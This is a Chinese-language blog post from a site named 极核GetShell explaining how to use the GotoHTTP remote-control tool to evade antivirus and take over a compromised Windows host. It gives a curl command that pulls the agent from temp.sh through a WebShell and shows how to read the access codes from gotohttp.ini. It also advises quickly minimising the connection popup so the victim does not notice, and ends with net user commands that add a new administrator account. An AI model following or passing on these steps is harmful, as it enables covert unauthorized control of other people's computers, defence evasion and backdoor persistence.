Monday, May 20, 2024

【远程控制】GotoHTTP 无视杀软实现远控

 

使用场景

在目标机器有杀毒软件拦截的情况下,CS 可能无法上线。这时候可以用 todesk 或向日葵这种远控工具进行横向移动,不过这两个工具由于国产化,可能不怎么方便。所以本篇文章介绍一下GotoHTTP这个远控软件的使用,演示场景:目标机器为Windows机器

需要注意的是,官网下载的客户端为被控端,控制端需要在GotoHTTP的官方网站进行远控。

官网 & 控制端:GotoHTTP – 在线远程控制平台

图片[1] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

优缺点分析

优点:

  • B2C 模式,无需安装控制端软件,有浏览器就可以远控。
  • 流量走 https 协议,只要目标放行 443 端口出口就可以实现内网穿透。
  • 在低带宽也可以使用,运行占用内存极低,控制时占用 CPU 仅为 0%-3%。
  • 被控端在类 Linux 系统上支持图形界面(GUI)和字符界面(CLI)。

缺点:

  • 需要管理员权限运行
  • 一些行为(网络唤醒远程主机)需要加载驱动,导致运行时 360 安全卫士会拦截这行为,其他杀软则不会拦截。

使用方式及场景

拥有完全权限

在掌握目标的完全权限情况下:管理员权限以及远程桌面权限,那么可以直接将GotoHTTP的被控端放到目标机器上执行。打开窗口内含电脑ID远控码,同时在执行程序的当前目录下,生成gotohttp.ini文件,文件内同样包含电脑ID远控码

图片[2] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

然后在GotoHTTP官网输入控制码,即可远控!

图片[3] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell
图片[4] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

只拥有命令行权限

这种情况下多数是拥有管理员的命令行权限,如上了WebShell拥有命令行权限,但是上不了远程。在这种情况下就可以使用此方法了。

如果有WebShell管理端的话,直接上传GotoHTTP的控制端文件,没有的话请看下面!

先想办法上传 GotoHTTP的被控端程序,生成一个下载直链,这边演示的是使用 https://temp.sh/进行上传后生成一个临时文件。

图片[5] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

在上传后成功获得一个下载直链,需要注意的是:temp.sh这个网站,上传后获得的直链,GET访问是文件详细的HTML页面而非文件,POST访问才是下载文件!

在你的WebShell端的命令执行页面或其他可以命令执行的地方,执行下载命令:

curl -X POST -o GotoHTTP.exe <你的下载直链>
图片[6] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

然后运行在目标机器下载的GotoHTTP.exe,执行命令:GotoHTTP.exe,运行GotoHTTP,然后成功生成gotohttp.ini文件,说明成功运行了!

图片[7] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

通过读取gotohttp.ini配置文件,读取远控码!name为电脑ID,tmp为控制码

图片[8] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

接着打开打开在线连接网站:https://gotohttp.com/,输入电脑 ID (name) 和控制码 (tmp) ,执行远控即可!

图片[9] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

注意事项:成功连接后目标机会自动出现这个弹窗,手速要快,把它最小化

图片[10] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

总结

GotoHTTP 可以成功绕过免杀进行远控但是需要的前提是有命令执行和文件上传功能,命令下载文件的话需要目标机器上面装有 curl (应该还有其他方法)。

而且连接成功后如果目标机器锁屏的话那也还是进不去桌面的!解决方法

  • 创建一个用户:net user <username> <password> /add
  • 添加 XX 到管理员账户net loaclgroup administrators <username> /add

No comments:

YouTube Channel